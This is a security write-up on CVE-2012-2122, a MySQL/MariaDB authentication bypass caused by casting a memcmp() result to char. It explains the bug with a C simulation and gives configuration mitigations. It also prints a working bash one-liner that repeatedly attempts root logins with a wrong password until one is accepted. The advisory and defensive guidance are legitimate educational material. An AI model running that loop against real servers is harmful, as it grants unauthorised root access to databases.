CVSS v2 Base Score: 5.1 (Medium)
Access Vector: NETWORK
Access Complexity: HIGH
Authentication: NONE
Confidentiality Impact: PARTIAL
Integrity Impact: PARTIAL
Availability Impact: PARTIAL
CVSS v2 Vector: AV:N/AC:H/Au:N/C:P/I:P/A:P
EPSS Score: 0.972 (High)
EPSS Percentile: 99.7%
CVE-2012-2122: Serious MySQL Authentication Bypass Vulnerability
A serious security bug in MariaDB and MySQL has been disclosed. According to the advisory, all MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5 and 5.5.22 are vulnerable. The issue has been assigned CVE-2012-2122.
"When a user connects to MariaDB/MySQL, a token (SHA over a password and a random scramble string) is calculated and compared with the expected value. Because of incorrect casting, it might've happened that the token and the expected value were considered equal, even if the memcmp() returned a non-zero value. In this case MySQL/MariaDB would think that the password is correct, even while it is not. Because the protocol uses random strings, the probability of hitting this bug is about 1/256."
"Which means, if one knows a user name to connect (and 'root' almost always exists), she can connect using any password by repeating connection attempts. ~300 attempts takes only a fraction of second, so basically account password protection is as good as nonexistent. Any client will do, there's no need for a special libmysqlclient library."
The following bash one-liner will get you a session on an affected MySQL server as the root account without knowing the password. Each iteration is one connection attempt with a deliberately wrong password; once an attempt is accepted, the mysql client drops into its interactive prompt (the `mysql>` shown at the end), and the remaining iterations only resume after you exit that session. One caveat: the bypass only triggers on builds where memcmp() can return a value outside the range of a signed char (for example optimized SSE memcmp implementations in glibc on x86-64), so not every installation in the affected version range is exploitable in practice.

```bash
$ for i in $(seq 1 1000); do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done
mysql>
```
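The advisory quoted above attributes the bypass to incorrect casting of the memcmp() result. The following C program is an added illustration written for this page, not MySQL's or MariaDB's own code: it reproduces the shape of the bug (an int from memcmp() returned through a char-typed my_bool) next to the corrected shape (normalising to 0/1 before the narrowing), and runs both against random wrong tokens to show the roughly 1/256 acceptance rate. The memcmp_wide() stand-in, the xorshift PRNG and the two crafted tokens are assumptions for the demonstration; the stand-in only models the relevant property of optimized memcmp implementations (returning differences other than -1/0/1), not any real libc code.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

typedef char my_bool;      /* MySQL's my_bool was a plain char */
#define HASH_SIZE 20       /* SHA-1 digest length, as compared by the real check */

/* Stand-in for an optimized memcmp() that can return any int difference, not
 * just -1/0/1 (assumption for illustration, not glibc's code). It compares
 * 32-bit words and returns the difference of the first mismatching pair, so
 * the low 8 bits of the result are zero whenever the first bytes of that word
 * agree, which is what a char-sized return value cannot distinguish from 0. */
int memcmp_wide(const void *a, const void *b, size_t n)
{
    const uint8_t *pa = a, *pb = b;
    size_t i = 0;
    for (; i + 4 <= n; i += 4) {
        uint32_t wa, wb;
        memcpy(&wa, pa + i, 4);
        memcpy(&wb, pb + i, 4);
        if (wa != wb)
            return (int)(wa - wb);   /* non-zero int, possibly a multiple of 256 */
    }
    for (; i < n; i++)               /* byte-wise tail for lengths not divisible by 4 */
        if (pa[i] != pb[i])
            return (int)pa[i] - (int)pb[i];
    return 0;
}

/* Vulnerable shape: the int from memcmp() is narrowed to a char on return.
 * Any difference whose low 8 bits are zero becomes 0, i.e. "password OK". */
my_bool check_scramble_vuln(const uint8_t *expected, const uint8_t *got)
{
    return memcmp_wide(expected, got, HASH_SIZE);
}

/* Fixed shape: collapse to 0/1 before the value is narrowed. */
my_bool check_scramble_fixed(const uint8_t *expected, const uint8_t *got)
{
    return memcmp_wide(expected, got, HASH_SIZE) != 0;
}

/* Constructed tokens differing only in their second byte: the int difference
 * is a multiple of 256, so the vulnerable check reports a match. */
const uint8_t TOKEN_EXPECTED[HASH_SIZE] = {0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0a,
                                           0x0b, 0x0c, 0x0d, 0x0e, 0x0f, 0x10, 0x11, 0x12, 0x13, 0x14};
const uint8_t TOKEN_WRONG[HASH_SIZE]    = {0x01, 0x05, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0a,
                                           0x0b, 0x0c, 0x0d, 0x0e, 0x0f, 0x10, 0x11, 0x12, 0x13, 0x14};

/* xorshift64* PRNG (constructed for the simulation; seed must be non-zero). */
static uint8_t rnd_byte(uint64_t *s)
{
    *s ^= *s >> 12; *s ^= *s << 25; *s ^= *s >> 27;
    return (uint8_t)((*s * 2685821657736338717ULL) >> 56);
}

/* Simulate `trials` logins with a wrong password: random expected token
 * (random scramble) versus an unrelated random token from the client.
 * Returns how many the given check accepted (return value 0 == match). */
int count_bypasses(my_bool (*check)(const uint8_t *, const uint8_t *), uint64_t seed, int trials)
{
    uint64_t s = seed ? seed : 1;
    uint8_t expected[HASH_SIZE], got[HASH_SIZE];
    int accepted = 0;
    for (int t = 0; t < trials; t++) {
        for (int i = 0; i < HASH_SIZE; i++) {
            expected[i] = rnd_byte(&s);
            got[i] = rnd_byte(&s);
        }
        if (check(expected, got) == 0)
            accepted++;
    }
    return accepted;
}

int main(void)
{
    int n = 100000;
    printf("vulnerable check accepted %d of %d wrong tokens (about 1/256 expected)\n",
           count_bypasses(check_scramble_vuln, 42, n), n);
    printf("fixed check accepted %d of %d wrong tokens\n",
           count_bypasses(check_scramble_fixed, 42, n), n);
    return 0;
}
```

The crafted pair shows the mechanism deterministically; the simulation shows why the advisory puts the odds at about 1/256 per attempt, which is why a few hundred connections are enough. The fix is not in the comparison itself but in never letting a wide comparison result flow through a narrower type untested.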
**Defense:** The first rule of securing MySQL is not to expose it to the network at large in the first place. Most Linux distributions bind the MySQL daemon to localhost, which prevents remote access to the service. Where network access must be provided, MySQL also offers host-based access controls (the host part of each account, such as 'root'@'localhost' versus 'root'@'%'). There are few use cases in which the MySQL daemon should be intentionally exposed to the wider network without any form of host-based access control.
The easiest mitigation is to edit my.cnf so that the server only accepts TCP connections from the local system. Open my.cnf with the editor of your choice, find the section labeled [mysqld], and change (or add a line to set) the "bind-address" parameter to "127.0.0.1". Restart the MySQL service to apply the setting, then confirm with ss or netstat that port 3306 is listening on 127.0.0.1 only. Note that bind-address governs only the TCP listener; the Unix socket is unaffected, and remote users who still need access must be limited by their account's host part.
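The weak and corrected my.cnf settings side by side, as an added illustration for this page rather than a fragment taken from any distribution's shipped configuration. Three separate [mysqld] fragments are shown; only one belongs in a real file.

```ini
# Weak: the daemon listens on every interface. On a stock MySQL 5.5 build,
# omitting bind-address altogether has the same effect.
[mysqld]
bind-address = 0.0.0.0

# Corrected: only clients on the local system can reach the TCP listener,
# so the repeated-connection attack has to come from a local account.
[mysqld]
bind-address = 127.0.0.1

# Stricter alternative when no TCP client is needed at all:
# disable the TCP listener and serve only the Unix socket.
[mysqld]
skip-networking
```

After restarting the service, the listener check is the same in both cases: with bind-address set, `ss -ltn` (or `netstat -ltn`) should show 127.0.0.1:3306 and nothing on 0.0.0.0:3306; with skip-networking, port 3306 should not appear at all.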